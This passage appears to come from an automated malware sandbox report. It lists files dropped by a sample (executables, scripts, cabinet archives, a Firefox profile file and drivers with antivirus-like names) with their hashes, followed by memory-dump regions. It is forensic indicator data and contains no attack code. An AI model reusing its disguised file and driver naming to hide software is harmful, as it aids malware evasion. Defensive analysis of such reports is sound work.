                                                        SHA512

                                                        d9e9c937462c62b0d0d9b1825ee963a26ebe6da9b79be0e5171f3277c3ef4bbf5f1d758d65d446cad28ec82f57178424dafd0c985189877be4b8a9992e9f6de1

                                                      • C:\Users\Admin\AppData\Local\Temp\10338800101\fb1db8ba52.exe

                                                        Filesize

                                                        4.3MB

                                                        MD5

                                                        b366e5895378d3a15b4ce3365f6ab17d

                                                        SHA1

                                                        54481f139a06b49d41fa87e15d1d271708cb84a0

                                                        SHA256

                                                        7e2e6f2550b25645e419697530752f30364cb8aab4d051b3e81a1686c0b22a07

                                                        SHA512

                                                        b4e3f95daab690a1e9718e1101ada9f22e781b2cd2a1f7b537848b099e1ffe8b9744ad754af83bdea522b99de1361d66ce87799ae72e9c96168c79a54c9e73ca

                                                      • C:\Users\Admin\AppData\Local\Temp\10338810101\8f985f0a6c.exe

                                                        Filesize

                                                        1.1MB

                                                        MD5

                                                        96fa728730da64d7d6049c305c40232c

                                                        SHA1

                                                        3fd03c4f32e3f9dbcc617507a7a842afb668c4de

                                                        SHA256

                                                        28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

                                                        SHA512

                                                        c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

                                                      • C:\Users\Admin\AppData\Local\Temp\11.exe

                                                        Filesize

                                                        88KB

                                                        MD5

                                                        89ccc29850f1881f860e9fd846865cad

                                                        SHA1

                                                        d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                        SHA256

                                                        4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                        SHA512

                                                        0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                      • C:\Users\Admin\AppData\Local\Temp\28e8ad9c-3167-47b4-a406-d9d7dd8852f9.zip

                                                        Filesize

                                                        3.6MB

                                                        MD5

                                                        eee2a159d9f96c4dd33473b38ae62050

                                                        SHA1

                                                        cd8b28c9f4132723de49be74dd84ea12a42eef54

                                                        SHA256

                                                        52c720ca9b1d7649214694bc46a9ea0cf2ee3091e1ac717633ee06b6e2864384

                                                        SHA512

                                                        553c8b347e1654ca256dd4b760deb669cf394763419c972bb60a555006525afed2cff53b2516e8b239bc4bb35afd5429bd89611303143e7e65b901c0f5c2cc07

                                                      • C:\Users\Admin\AppData\Local\Temp\90MNlg9BM.hta

                                                        Filesize

                                                        717B

                                                        MD5

                                                        66f9652e5af902d8fbf11a30f38de208

                                                        SHA1

                                                        8502a61969780d12745a9fddef0dd57c103be5e0

                                                        SHA256

                                                        15b4b2bb6a00c792229f9bb01a3be1c30055d9da7b618763c58c0fd3d1343d16

                                                        SHA512

                                                        4134610c5931437ca8484f54e9f8b6cc0ec559e013b6a617da2450aa44b808eec0d71aadf1c68c41f28a837dae6b7f4b167ea2d4bddf31a5cffb2b7c1a140d72

                                                      • C:\Users\Admin\AppData\Local\Temp\Expectations.cab

                                                        Filesize

                                                        25KB

                                                        MD5

                                                        ccc575a89c40d35363d3fde0dc6d2a70

                                                        SHA1

                                                        7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

                                                        SHA256

                                                        c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

                                                        SHA512

                                                        466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

                                                      • C:\Users\Admin\AppData\Local\Temp\F81B.tmp\F81C.tmp\F81D.bat

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        e5ddb7a24424818e3b38821cc50ee6fd

                                                        SHA1

                                                        97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                        SHA256

                                                        4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                        SHA512

                                                        450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                      • C:\Users\Admin\AppData\Local\Temp\Flying.cab

                                                        Filesize

                                                        58KB

                                                        MD5

                                                        85ce6f3cc4a96a4718967fb3217e8ac0

                                                        SHA1

                                                        d3e93aacccf5f741d823994f2b35d9d7f8d5721e

                                                        SHA256

                                                        103ac8e9bf15a6e127cd4259fec1518bf1c217c5c8b375e394e26d32df3f58c8

                                                        SHA512

                                                        c714e05078b4ee6461067db2e3eeae5ac019d499415448660ad0f1e2bf772859693fa201da5e6cf9c794b05d197e3f3db34f74804dc76c8638abd8caed15ef06

                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs

                                                        Filesize

                                                        13KB

                                                        MD5

                                                        d98dc12602245312a8a26cd8275a656d

                                                        SHA1

                                                        1cdb0372036520a7567a56b0546b363d2ccc1a74

                                                        SHA256

                                                        44f76c4d1ad6c2354523fb3a801f7a8c0736ac89a13f089bc5dd4ebb61e9d8d1

                                                        SHA512

                                                        e2e484246aad80329f93c88ef38949a951014785f12897b536689d7e82b00772ada0e9f68f38d4a0cbb83eaac40487e0c2acc46fc8d9cd7b0f7065d6b0ae373a

                                                      • C:\Users\Admin\AppData\Local\Temp\Illegal.cab

                                                        Filesize

                                                        50KB

                                                        MD5

                                                        84994eb9c3ed5cb37d6a20d90f5ed501

                                                        SHA1

                                                        a54e4027135b56a46f8dd181e7e886d27d200c43

                                                        SHA256

                                                        7ae9edc41731c97668c962aa2264c4cf8cc4098cc3afab085e2fd1f1cb317013

                                                        SHA512

                                                        6f689c3f4d4c9acbbdf3fab6d78d29df029882fd939975543c719b5bae816a407496189f2a26c72101d467439ec7b5c5eea75880f763f28dadae56f55af6a6d6

                                                      • C:\Users\Admin\AppData\Local\Temp\Kidney.cab

                                                        Filesize

                                                        56KB

                                                        MD5

                                                        397e420ff1838f6276427748f7c28b81

                                                        SHA1

                                                        ffa22fae219ecd8c2f6f107ed50db6a4df8f13eb

                                                        SHA256

                                                        35be8c1bae4d21707937bf6077858f47136f38d89e3111a7235d1c0f12868aa4

                                                        SHA512

                                                        f08d8c116b0546f1918c16b4d802e531d78f031b3946cbcaa5ef38ec34fd8081ebffaad97f7c2fd1838067e0778f27d66fe5b9de4f329136144e0d856c2e7ec0

                                                      • C:\Users\Admin\AppData\Local\Temp\Leon.cab

                                                        Filesize

                                                        479KB

                                                        MD5

                                                        ce2a1001066e774b55f5328a20916ed4

                                                        SHA1

                                                        5b9a7f4c7ce2b4a9a939b46523b6ae92498b3e3e

                                                        SHA256

                                                        572464ff91ca27c09a4635bbed4d10f33a064043dc432139ab94f78761cca1dd

                                                        SHA512


                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal

                                                        Filesize

                                                        80KB

                                                        MD5

                                                        e576238d290a7b865d71541ec37d4973

                                                        SHA1

                                                        0d8d3b0edc8bb602fd30ccdaa82ae8b377306770

                                                        SHA256

                                                        993cba2647499d6db857f3357db3ac9f3a6952e31009f5f6b73f825063b18af3

                                                        SHA512

                                                        a73b0d6a9a514c8ebb36d65ed22722c61a8dcb493e1d44d6a81f9e98a60f7c894760037261985a11f3986107b4cfd7cd8bd9dce72bca1fd91eb3e410f68aef83

                                                      • C:\Windows\System32\drivers\9c4d2b28.sys

                                                        Filesize

                                                        368KB

                                                        MD5

                                                        990442d764ff1262c0b7be1e3088b6d3

                                                        SHA1

                                                        0b161374074ef2acc101ed23204da00a0acaa86e

                                                        SHA256

                                                        6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

                                                        SHA512

                                                        af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

                                                      • C:\Windows\System32\drivers\klupd_9c4d2b28a_klark.sys

                                                        Filesize

                                                        355KB

                                                        MD5

                                                        9cfe1ced0752035a26677843c0cbb4e3

                                                        SHA1

                                                        e8833ac499b41beb6763a684ba60333cdf955918

                                                        SHA256

                                                        3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                        SHA512

                                                        29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                      • C:\Windows\System32\drivers\klupd_9c4d2b28a_klbg.sys

                                                        Filesize

                                                        199KB

                                                        MD5

                                                        424b93cb92e15e3f41e3dd01a6a8e9cc

                                                        SHA1

                                                        2897ab04f69a92218bfac78f085456f98a18bdd3

                                                        SHA256

                                                        ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                        SHA512

                                                        15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                      • C:\Windows\System32\drivers\klupd_9c4d2b28a_mark.sys

                                                        Filesize

                                                        260KB

                                                        MD5

                                                        66522d67917b7994ddfb5647f1c3472e

                                                        SHA1

                                                        f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                        SHA256

                                                        5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                        SHA512

                                                        921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

• memory/1096-197-0x00000239A9BE0000-0x00000239A9BF8000-memory.dmp (Filesize: 96KB)
• memory/1236-249-0x0000000000400000-0x0000000000463000-memory.dmp (Filesize: 396KB)
• memory/1236-250-0x0000000000400000-0x0000000000463000-memory.dmp (Filesize: 396KB)
• memory/1240-104-0x0000000005A30000-0x0000000005D84000-memory.dmp (Filesize: 3.3MB)
• memory/1428-21-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-251-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-45-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-22-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-179-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-1293-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-313-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-763-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-234-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-20-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-19-0x0000000000C61000-0x0000000000C8F000-memory.dmp (Filesize: 184KB)
• memory/1428-283-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1428-17-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/1436-1171-0x00000221A11A0000-0x00000221A1211000-memory.dmp (Filesize: 452KB)
• memory/1436-1161-0x0000000000600000-0x0000000000602000-memory.dmp (Filesize: 8KB)
• memory/1436-1170-0x00000221A11A0000-0x00000221A1211000-memory.dmp (Filesize: 452KB)
• memory/1436-1162-0x00000221A11A0000-0x00000221A1211000-memory.dmp (Filesize: 452KB)
• memory/1436-1172-0x00000221A11A0000-0x00000221A1211000-memory.dmp (Filesize: 452KB)
• memory/1568-177-0x0000000005DA0000-0x00000000060F4000-memory.dmp (Filesize: 3.3MB)
• memory/1568-178-0x00000000062B0000-0x00000000062FC000-memory.dmp (Filesize: 304KB)
• memory/1600-1157-0x0000000000400000-0x000000000069A000-memory.dmp (Filesize: 2.6MB)
• memory/1720-1-0x0000000077284000-0x0000000077286000-memory.dmp (Filesize: 8KB)
• memory/1720-4-0x00000000003E0000-0x00000000008BE000-memory.dmp (Filesize: 4.9MB)
• memory/1720-16-0x00000000003E0000-0x00000000008BE000-memory.dmp (Filesize: 4.9MB)
• memory/1720-0-0x00000000003E0000-0x00000000008BE000-memory.dmp (Filesize: 4.9MB)
• memory/1720-2-0x00000000003E1000-0x000000000040F000-memory.dmp (Filesize: 184KB)
• memory/1720-3-0x00000000003E0000-0x00000000008BE000-memory.dmp (Filesize: 4.9MB)
• memory/2216-265-0x0000000000DD0000-0x00000000010F5000-memory.dmp (Filesize: 3.1MB)
• memory/2216-267-0x0000000000DD0000-0x00000000010F5000-memory.dmp (Filesize: 3.1MB)
• memory/2944-100-0x0000000000920000-0x0000000000DDE000-memory.dmp (Filesize: 4.7MB)
• memory/2944-84-0x0000000000920000-0x0000000000DDE000-memory.dmp (Filesize: 4.7MB)
• memory/3188-101-0x00000000064B0000-0x00000000064FC000-memory.dmp (Filesize: 304KB)
• memory/3188-97-0x0000000005ED0000-0x0000000006224000-memory.dmp (Filesize: 3.3MB)
• memory/3192-214-0x0000000000AB0000-0x0000000000F6E000-memory.dmp (Filesize: 4.7MB)
• memory/3192-282-0x0000000000150000-0x00000000007DB000-memory.dmp (Filesize: 6.5MB)
• memory/3192-196-0x0000000000AB0000-0x0000000000F6E000-memory.dmp (Filesize: 4.7MB)
• memory/3192-284-0x0000000000150000-0x00000000007DB000-memory.dmp (Filesize: 6.5MB)
• memory/3556-231-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/3556-233-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/3560-218-0x0000000000400000-0x0000000000464000-memory.dmp (Filesize: 400KB)
• memory/3560-219-0x0000000000400000-0x0000000000464000-memory.dmp (Filesize: 400KB)
• memory/3780-61-0x0000000007730000-0x0000000007DAA000-memory.dmp (Filesize: 6.5MB)
• memory/3780-48-0x0000000005800000-0x0000000005866000-memory.dmp (Filesize: 408KB)
• memory/3780-46-0x0000000004E20000-0x0000000004E42000-memory.dmp (Filesize: 136KB)
• memory/3780-62-0x0000000006320000-0x000000000633A000-memory.dmp (Filesize: 104KB)
• memory/3780-76-0x0000000008360000-0x0000000008904000-memory.dmp (Filesize: 5.6MB)
• memory/3780-43-0x0000000004EC0000-0x00000000054E8000-memory.dmp (Filesize: 6.2MB)
• memory/3780-42-0x0000000004820000-0x0000000004856000-memory.dmp (Filesize: 216KB)
• memory/3780-60-0x0000000005EA0000-0x0000000005EEC000-memory.dmp (Filesize: 304KB)
• memory/3780-58-0x0000000005870000-0x0000000005BC4000-memory.dmp (Filesize: 3.3MB)
• memory/3780-75-0x0000000007230000-0x0000000007252000-memory.dmp (Filesize: 136KB)
• memory/3780-59-0x0000000005DF0000-0x0000000005E0E000-memory.dmp (Filesize: 120KB)
• memory/3780-47-0x0000000005720000-0x0000000005786000-memory.dmp (Filesize: 408KB)
• memory/3780-74-0x0000000007290000-0x0000000007326000-memory.dmp (Filesize: 600KB)
• memory/4080-147-0x0000027EF6250000-0x0000027EF6272000-memory.dmp (Filesize: 136KB)
• memory/5188-1404-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1401-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1398-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1397-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1396-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1395-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1394-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1393-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1392-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1389-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1383-0x0000000140000000-0x000000014043F000-memory.dmp (Filesize: 4.2MB)
• memory/5188-1403-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1405-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1400-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1406-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/5188-1402-0x0000000000860000-0x00000000009E8000-memory.dmp (Filesize: 1.5MB)
• memory/6020-630-0x0000000000330000-0x0000000000792000-memory.dmp (Filesize: 4.4MB)
• memory/6020-862-0x0000000000330000-0x0000000000792000-memory.dmp (Filesize: 4.4MB)
• memory/6020-661-0x0000000000330000-0x0000000000792000-memory.dmp (Filesize: 4.4MB)
• memory/6020-662-0x0000000000330000-0x0000000000792000-memory.dmp (Filesize: 4.4MB)
• memory/6020-813-0x0000000000330000-0x0000000000792000-memory.dmp (Filesize: 4.4MB)
• memory/6364-41893-0x0000000000400000-0x0000000000E1B000-memory.dmp (Filesize: 10.1MB)
• memory/6364-41579-0x0000000000400000-0x0000000000E1B000-memory.dmp (Filesize: 10.1MB)
• memory/12048-49405-0x0000000000400000-0x0000000000CC1000-memory.dmp (Filesize: 8.8MB)
• memory/12048-48199-0x0000000000400000-0x0000000000CC1000-memory.dmp (Filesize: 8.8MB)
• memory/12048-43069-0x0000000000400000-0x0000000000CC1000-memory.dmp (Filesize: 8.8MB)
• memory/13144-41578-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)
• memory/13144-41492-0x0000000000C60000-0x000000000113E000-memory.dmp (Filesize: 4.9MB)